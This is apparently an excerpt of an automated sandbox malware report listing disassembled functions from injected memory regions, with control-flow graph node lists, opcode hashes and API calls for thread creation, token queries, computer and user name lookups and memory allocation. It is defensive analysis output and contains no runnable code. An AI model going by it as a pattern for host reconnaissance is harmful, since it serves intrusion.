                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 2dd7c21ffa7714e6844fd14691ff67a7b1982013f85ead3638705f0821c27294
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F1393071CE494FC769A72C686527A7FE2F7D9310F58859BD44EC3296DD289C0AD382
                                                                                                                                                                      Function 00555B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 333 555b42-555b47 call 555d90 335 555b4c-555b52 333->335 337 555c42-555c62 call 571280 335->337 338 555b0d 335->338 353 555c14-555cc0 337->353 354 555c26 337->354 338->337 339 555b13 338->339 341 555c8f-555c96 339->341 343 555c29 341->343 344 555c98-555c9a 341->344 346 555cc2-555cc9 call 5552a0 343->346 347 555c2f-555c36 343->347 345 555c9c 344->345 356 555d0e-555d18 345->356 357 555bfa 345->357 362 555c69 346->362 363 555ccb 346->363 347->346 351 555c3c 347->351 351->333 353->346 354->353 361 555c28 354->361 358 555d54 356->358 359 555d1a 356->359 357->356 364 555c00 357->364 367 555d4b-555d52 359->367 361->343 365 555c6f 362->365 366 555b68-555d75 362->366 363->345 368 555ccd 363->368 364->353 365->366 369 555c75 365->369 367->358 370 555d45-555d47 367->370 368->345 371 555ccf-555ce4 CreateThread 368->371 369->341 374 555d5f 370->374 375 555d49 370->375 376 555c01-555c05 371->376 377 555cea 371->377 379 555d65 374->379 375->367 375->374 381 555c20-555c68 376->381 384 555d37-555d41 376->384 377->376 380 555cf0-555cf6 377->380 379->379 380->381 384->367 385 555d43 384->385 385->358
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: e98fedac3669f3bacdb2b025bf33f7699b98b34fbec8ad24cd2df992d53f9fa8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: EF21BC3120CF458FCB6A9B18847C7742EE1BB94363F6809A79C47CF1A2FA649D4C9312
                                                                                                                                                                      Function 00555B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 386 555b09-555d01 391 555bb4-555ce4 CreateThread 386->391 392 555d07 386->392 399 555c01-555c05 391->399 400 555cea 391->400 392->391 394 555d0d 392->394 396 555d37-555d41 394->396 397 555d43 396->397 398 555d4b-555d52 396->398 403 555d54 397->403 402 555d45-555d47 398->402 398->403 399->396 405 555c20-555c68 399->405 400->399 404 555cf0-555cf6 400->404 406 555d5f 402->406 407 555d49 402->407 404->405 410 555d65 406->410 407->398 407->406 410->410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 8f6c29b8ec0e57f47b7e52ac4218af89e0a6a4365c3e6bcff3dd437489af9907
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: BC01923150DF868FDB5656248C393797FA0BB50337F6509AB8C87CA0A1FAA54E0CA712
                                                                                                                                                                      Function 00555B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 411 555b87-555b99 CreateThread 412 555b1c-555b3b 411->412 413 555cff-555d01 411->413 412->413 414 555bb4-555ce4 CreateThread 413->414 415 555d07 413->415 423 555c01-555c05 414->423 424 555cea 414->424 415->414 417 555d0d 415->417 420 555d37-555d41 417->420 421 555d43 420->421 422 555d4b-555d52 420->422 427 555d54 421->427 426 555d45-555d47 422->426 422->427 423->420 429 555c20-555c68 423->429 424->423 428 555cf0-555cf6 424->428 430 555d5f 426->430 431 555d49 426->431 428->429 434 555d65 430->434 431->422 431->430 434->434
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: cc78e9fc544a56d08db6f684efccd869178b29dcb8a349e34b04668ca805b02a
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE04F3060DB444FDB5A9B2458343197EA5BB88321F1545CBC84AD7191EB69090A4792
                                                                                                                                                                      Function 0055599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 435 55599b-55599e 436 5559f7 435->436 437 5559b8 call 570df0 435->437 438 555a02 436->438 441 5559bd-5559c2 call 555d90 437->441 443 5559d4-555a15 call 5711a0 438->443 444 55597d 438->444 445 5559c7-5559ce 441->445 444->443 446 55597f-555981 444->446 448 5559d0 445->448 449 555a1a-555a26 call 555e10 445->449 450 555983-555a38 446->450 448->449 452 5559d2 448->452 456 555994-55599c 449->456 465 555a0d 449->465 450->456 457 555a3e call 582190 450->457 452->443 456->438 460 55599e 456->460 457->456 471 5559e0 457->471 460->436 469 555991 465->469 470 555932 465->470 469->470 472 555993 469->472 474 5559e4-5559ec call 5821ac 470->474 471->456 473 5559e2 471->473 472->456 473->474 477 555a62-555a6e 474->477 478 5559ed 474->478 480 555a75-555ab3 call 571280 477->480 481 555a70 477->481 478->450 479 5559ee-5559ef 478->479 479->450 482 5559f1 call 589970 479->482 491 555ab5 480->491 492 555abb-555ac9 480->492 481->480 483 555a72 481->483 482->437 483->480 491->492 493 555ab7-555ab9 491->493 494 555af2-555af5 492->494 493->492 497 555ad5 494->497 498 555adb-555adc 494->498 497->498 499 555ad7-555ad9 497->499 500 555a45-555a46 498->500 501 555ae2 498->501 499->498 501->500 502 555ae8 501->502 502->494
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 95444e6c9290c8ff350e0c7071b4d8ed4dba8bca50f27d419fa6934e0e3f310f
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01A2B091DF81CFD656AA1884792796DB1BB94327F6849979C4ACB092F92C4D0CD341
                                                                                                                                                                      Function 00558090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 503 558090-558096 504 558184 503->504 505 55813c-5581a5 503->505 506 558186 CloseHandle 504->506 507 55818c-558192 504->507 517 5581a7 505->517 518 5581bd-5581ca 505->518 506->507 509 558115-558118 507->509 510 558194 507->510 512 5580a7 509->512 513 558119-55811a 509->513 510->509 514 55819a 510->514 513->512 516 55811c 513->516 514->505 519 55820f 516->519 524 5581d0 518->524 525 5580f3 518->525 520 558215-55821e 519->520 521 55808e-558096 519->521 520->521 528 558224 520->528 521->504 535 5580c3 524->535 536 5581fe-558201 GetTokenInformation 524->536 526 5580f5 525->526 527 55808c 525->527 526->527 538 558077 526->538 527->521 532 5581d7-5581e6 call 58715c 528->532 533 558226 528->533 544 5580ca-55810f GetTokenInformation 532->544 555 558089 532->555 533->532 534 558228-5582ee call 555d90 533->534 560 5582f0 534->560 561 55830c-558320 call 555d90 call 55ec00 534->561 535->536 540 5580c9 535->540 536->519 547 5581b7 536->547 538->532 540->544 552 558111 544->552 553 55812d 544->553 547->519 551 5581b9-5581bb 547->551 551->518 552->553 557 558113 552->557 558 558133-5581f0 553->558 559 5580a8 553->559 555->544 556 55808b 555->556 556->527 557->509 570 5581f6 558->570 571 5580da-5580f1 558->571 563 5580aa-5580ad 559->563 560->561 562 5582f2 560->562 566 5582f7-5582fc call 555d90 561->566 590 558322 561->590 562->566 568 558163-558170 call 587164 563->568 569 5580b3-558203 563->569 582 558253-558265 call 571280 566->582 583 558302 566->583 568->506 584 558172 568->584 569->568 577 558209 569->577 570->571 576 5581fc 570->576 571->563 576->536 592 558328 582->592 593 55826b 582->593 583->582 587 558308-55830a 583->587 584->507 587->561 590->566 594 558324-558326 590->594 598 558335 592->598 599 5582df-55832b 592->599 593->592 597 55823f-558243 593->597 594->592 597->566 602 558287 598->602 603 55829b-55829d 598->603 599->598 604 55832d-558331 599->604 602->603 606 55824e-558252 602->606 604->598 606->582
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 4f798f558f163d2741895c63f4acba36b27e20878f1513dd5ccd62ed3c39f437
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 67C04C61529D4696567906481C3F0B42E50B702793B1C48579C16A1220DD559E4BD797
                                                                                                                                                                      Function 0055817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 607 55817f 608 558184 607->608 609 558186 CloseHandle 608->609 610 55818c-558192 608->610 609->610 611 558115-558118 610->611 612 558194 610->612 613 5580a7 611->613 614 558119-55811a 611->614 612->611 615 55819a-5581a5 612->615 614->613 616 55811c 614->616 625 5581a7 615->625 626 5581bd-5581ca 615->626 618 55820f 616->618 620 558215-55821e 618->620 621 55808e-558096 618->621 620->621 627 558224 620->627 621->608 633 5581d0 626->633 634 5580f3 626->634 628 5581d7-5581e6 call 58715c 627->628 629 558226 627->629 650 558089 628->650 651 5580ca-55810f GetTokenInformation 628->651 629->628 631 558228-5582ee call 555d90 629->631 656 5582f0 631->656 657 55830c-558320 call 555d90 call 55ec00 631->657 646 5580c3 633->646 647 5581fe-558201 GetTokenInformation 633->647 637 5580f5 634->637 638 55808c 634->638 637->638 648 558077 637->648 638->621 646->647 653 5580c9 646->653 647->618 664 5581b7 647->664 648->628 650->651 652 55808b 650->652 659 558111 651->659 660 55812d 651->660 652->638 653->651 656->657 658 5582f2 656->658 663 5582f7-5582fc call 555d90 657->663 693 558322 657->693 658->663 659->660 665 558113 659->665 667 558133-5581f0 660->667 668 5580a8 660->668 680 558253-558265 call 571280 663->680 681 558302 663->681 664->618 670 5581b9-5581bb 664->670 665->611 678 5581f6 667->678 679 5580da-5580f1 667->679 671 5580aa-5580ad 668->671 670->626 675 558163-558170 call 587164 671->675 676 5580b3-558203 671->676 675->609 692 558172 675->692 676->675 686 558209 676->686 678->679 685 5581fc 678->685 679->671 695 558328 680->695 696 55826b 680->696 681->680 687 558308-55830a 681->687 685->647 687->657 692->610 693->663 698 558324-558326 693->698 702 558335 695->702 703 5582df-55832b 695->703 696->695 701 55823f-558243 696->701 698->695 701->663 706 558287 702->706 707 55829b-55829d 702->707 703->702 708 55832d-558331 703->708 706->707 710 55824e-558252 706->710 708->702 710->680
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.2615989880.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_550000_msdtc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 6cad248b4c347d916ac764968d84c464383347c0c825e8e2f82becda7aceba15
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: CBC092A0958D0987513826882C2E0B13D9077137A3F1C8823EC16BB360DD686D8BC7A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.9%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:94
                                                                                                                                                                      Total number of Limit Nodes:10
                                                                                                                                                                      execution_graph 5391 b181b1 5395 b18075 5391->5395 5392 b18186 CloseHandle 5392->5395 5393 b181ad GetTokenInformation 5393->5395 5394 b180ca GetTokenInformation 5394->5395 5395->5392 5395->5393 5395->5394 5396 b180a7 5395->5396 5456 b18090 5458 b18075 5456->5458 5457 b18186 CloseHandle 5457->5458 5458->5457 5459 b180ca GetTokenInformation 5458->5459 5460 b180a7 5458->5460 5461 b181ad GetTokenInformation 5458->5461 5459->5458 5461->5458 5477 b157f0 5480 b155ac 5477->5480 5478 b155e4 5480->5477 5480->5478 5481 b33870 5480->5481 5482 b33876 5481->5482 5484 b33893 5482->5484 5485 b33720 5482->5485 5484->5480 5487 b20c42 5485->5487 5486 b1e050 VirtualAlloc 5486->5487 5487->5485 5487->5486 5488 b337dd 5487->5488 5488->5484 5488->5488 5462 b152f4 5465 b152cb 5462->5465 5463 b152b0 5464 b153c4 GetSystemDefaultLangID 5464->5463 5465->5463 5465->5464 5451 b152b7 5452 b152b0 5451->5452 5453 b152c4 5451->5453 5453->5452 5454 b153c4 GetSystemDefaultLangID 5453->5454 5455 b15475 5454->5455 5397 b15b00 5398 b15bba 5397->5398 5405 b252c0 5398->5405 5400 b15bc7 5404 b15bde 5400->5404 5410 b30080 5400->5410 5406 b252c6 5405->5406 5407 b252ce 5405->5407 5406->5407 5424 b1e050 5406->5424 5407->5400 5416 b30089 5410->5416 5411 b303e0 GetComputerNameW 5411->5416 5412 b30181 VirtualFree 5412->5416 5413 b1e050 VirtualAlloc 5413->5416 5414 b303bf GetUserNameW 5414->5416 5415 b304d6 GetComputerNameW 5415->5416 5416->5411 5416->5412 5416->5413 5416->5414 5416->5415 5417 b15c7b 5416->5417 5418 b18070 5417->5418 5421 b18075 5418->5421 5419 b18186 CloseHandle 5419->5421 5420 b180a7 5420->5404 5421->5419 5421->5420 5422 b181ad GetTokenInformation 5421->5422 5423 b180ca GetTokenInformation 5421->5423 5422->5421 5423->5421 5425 b1e0c3 5424->5425 5426 b1e0d8 VirtualAlloc 5425->5426 5426->5425 5466 b15860 5467 b252c0 VirtualAlloc 5466->5467 5468 b15869 5467->5468 5469 b30080 5 API calls 5468->5469 5470 b1587d 5469->5470 5471 b18070 3 API calls 5470->5471 5472 b15870 5471->5472 5427 b15b42 5428 b15b07 5427->5428 5428->5427 5430 b15b68 5428->5430 5432 b15bb4 5428->5432 5433 b152a0 5428->5433 5431 b15cdf CreateThread 5431->5430 5431->5432 5437 b154a0 5431->5437 5432->5430 5432->5431 5436 b152ab 5433->5436 5434 b153c4 GetSystemDefaultLangID 5435 b152b0 5434->5435 5435->5428 5436->5434 5436->5435 5438 b154b5 5437->5438 5444 b15b87 CreateThread 5445 b15b1c 5444->5445 5449 b15810 5444->5449 5446 b15cdf CreateThread 5445->5446 5447 b15c01 5445->5447 5446->5445 5446->5447 5448 b154a0 5446->5448 5450 b15822 5449->5450 5524 b15347 5525 b152cb 5524->5525 5526 b153c4 GetSystemDefaultLangID 5525->5526 5528 b152b0 5525->5528 5527 b15475 5526->5527 5499 b15b09 5500 b15b16 5499->5500 5501 b15c01 5500->5501 5502 b15cdf CreateThread 5500->5502 5502->5500 5502->5501 5503 b154a0 5502->5503 5489 b155ef 5492 b155ac 5489->5492 5490 b33870 VirtualAlloc 5490->5492 5491 b155e4 5492->5490 5492->5491

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00B152A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 282 b152a0-b153fe 287 b15400-b15424 282->287 288 b50d4c-b50d4e 282->288 290 b1539b 287->290 291 b1542a 287->291 293 b15413-b15419 290->293 294 b1539d-b153a1 290->294 291->290 292 b15430-b1543e 291->292 297 b15441-b1544a 292->297 295 b152b0-b152b5 294->295 296 b153a7 294->296 296->295 298 b153ad 296->298 302 b15450 297->302 303 b153c4-b153ca GetSystemDefaultLangID 297->303 300 b153f3-b153f9 298->300 301 b153af 298->301 312 b15355 300->312 313 b1532a 300->313 304 b153e0-b153f1 301->304 310 b15411 302->310 311 b153c1 302->311 306 b15475-b1547b 303->306 304->293 304->300 306->288 310->293 310->303 311->310 314 b153c3 311->314 317 b152d1-b152e7 312->317 318 b152e8-b15363 312->318 313->312 316 b1532c-b1533f 313->316 319 b1536b-b1536f 316->319 317->318 324 b153d1-b153d5 318->324 325 b15365 318->325 319->297 322 b15375-b15390 319->322 322->314 326 b15392-b1539a 322->326 324->294 327 b153d7 324->327 325->324 328 b15367-b15369 325->328 326->294 327->304 329 b15342-b15345 327->329 328->319 329->287 330 b1534b 329->330 330->287 331 b15351-b15353 330->331 331->312
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00B153C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 567ab531e36b06aaf6cef039aa4213df7661d0fa140291a587d6d1c06bfb28b7
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 0241B46241DE95CFD73A422468A42F07BE0DB923A2FDD04E7D4E3C71E6D1A85CC1936A
                                                                                                                                                                      Function 00B30080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 b30080-b30286 2 b30099-b30575 0->2 3 b3028c 0->3 7 b30155 2->7 8 b3057b 2->8 5 b30445 3->5 5->2 6 b3044b-b30457 5->6 9 b30458-b30472 GetComputerNameW 6->9 11 b302ef-b30495 call b1e050 * 2 7->11 8->7 10 b30581-b30587 8->10 15 b303ee-b303f4 9->15 16 b3024c-b30253 9->16 13 b3058b 10->13 11->9 55 b3043e 11->55 18 b30181 VirtualFree 13->18 19 b3058c-b30591 13->19 37 b300da-b3023f 15->37 38 b303fa 15->38 23 b301e6 16->23 24 b30255 16->24 20 b301a8-b302ac call b47164 18->20 21 b30597 19->21 22 b304ab-b304af 19->22 27 b302b1-b302be 20->27 21->22 30 b3059d 21->30 48 b304c7 22->48 23->27 28 b301ec-b30313 call b4715c 23->28 31 b302d3 24->31 33 b302c4 27->33 34 b303bf-b303d9 GetUserNameW 27->34 52 b30318-b3031e 28->52 30->22 31->23 36 b302d9 31->36 33->34 43 b302ca 33->43 44 b30331 34->44 36->11 37->16 50 b30241-b3024a 37->50 38->37 45 b30400 38->45 43->31 53 b30171 44->53 54 b30337 44->54 51 b3b1ee-b3b49f 45->51 58 b304cc-b304e6 call b49970 GetComputerNameW 48->58 50->16 50->27 56 b30324 52->56 57 b30568-b3056b 52->57 59 b30173 53->59 60 b3013f-b30146 53->60 54->53 61 b3033d 54->61 55->5 56->57 64 b3032a 56->64 57->58 70 b30131 58->70 71 b304ec-b30514 58->71 66 b30230 59->66 60->13 62 b305d0-b305d9 61->62 62->51 64->44 66->48 67 b30236-b305c2 66->67 67->48 74 b305c8-b305c9 67->74 72 b30137 70->72 73 b30089-b3008c 70->73 71->57 72->73 77 b3013d 72->77 73->20 76 b30092 73->76 74->62 76->20 78 b30098 76->78 77->18 77->60 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: a482213db9b2e0bc4c833df859b9567399ecd68b110d06e34e977a844067b0ba
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: 11D10531428F0D8BC728FF58D8957EAB7E1FFA0310F28469EE846C3264DA74964587C2
                                                                                                                                                                      Function 00B18070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 b18070-b1817e 81 b18180 79->81 82 b1813d-b181a5 79->82 83 b18184 81->83 84 b1815f 81->84 96 b181a7 82->96 97 b181bd-b181ca 82->97 86 b18186 CloseHandle 83->86 87 b1818c-b18192 83->87 84->82 85 b18161 84->85 89 b18163-b18170 call b47164 85->89 86->87 90 b18115-b18118 87->90 91 b18194 87->91 89->86 103 b18172 89->103 94 b180a7 90->94 95 b18119-b1811a 90->95 91->90 98 b1819a 91->98 95->94 100 b1811c 95->100 105 b181d0 97->105 106 b180f3 97->106 101 b1813c 98->101 104 b1820f 100->104 101->83 103->87 107 b18215-b1821e 104->107 108 b1808e-b18096 104->108 116 b180c3 105->116 117 b181fe-b18201 GetTokenInformation 105->117 109 b180f5 106->109 110 b1808c 106->110 107->108 115 b18224 107->115 108->83 108->94 109->110 118 b18077 109->118 110->108 119 b181d7-b181de call b4715c 115->119 120 b18226 115->120 116->117 121 b180c9 116->121 117->104 130 b181b7 117->130 118->119 128 b181e3-b181e6 119->128 120->119 123 b18228-b182ee call b15d90 120->123 126 b180ca-b180d8 GetTokenInformation 121->126 146 b182f0 123->146 147 b1830c-b1831e 123->147 129 b1810f 126->129 128->126 144 b18089 128->144 131 b18111 129->131 132 b1812d 129->132 130->104 135 b181b9-b181bb 130->135 131->132 137 b18113 131->137 139 b18133 132->139 140 b180a8 132->140 135->97 137->90 139->101 143 b181ed-b181f0 139->143 142 b180aa-b180ad 140->142 142->89 148 b180b3-b18203 142->148 149 b181f6 143->149 150 b180da-b180f1 143->150 144->126 145 b1808b 144->145 145->110 146->147 151 b182f2 146->151 154 b182a1-b182ba call b15d90 call b1ec00 147->154 155 b18320 147->155 148->89 158 b18209 148->158 149->150 153 b181fc 149->153 150->142 157 b182f7-b182fc call b15d90 151->157 153->117 154->155 156 b18322 155->156 155->157 156->157 161 b18324-b18326 156->161 169 b18253-b18265 call b31280 157->169 170 b18302 157->170 164 b18328 161->164 172 b18335 164->172 173 b182df-b1832b 164->173 169->164 180 b1826b 169->180 170->169 175 b18308-b1830a 170->175 178 b1826e-b18285 172->178 173->172 179 b1832d-b18331 173->179 175->147 181 b18287 178->181 182 b1829b-b1829d 178->182 179->172 180->178 183 b18239 180->183 184 b1824c 181->184 182->154 183->164 185 b1823f-b18243 183->185 184->182 186 b1824e-b18252 184->186 185->157 185->184 186->178
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2624393008.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_b10000_PerceptionSimulationService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: 6d3d69c43a76cbb79b0be27f1c16ccdbfc1cc12a734981460f18c74c0f171446
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: FD61473250CA49AFC7668B2898987F57BE1FB5D350FE802DAE446D31A0DF344CD58392
                                                                                                                                                                      Function 00B15910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
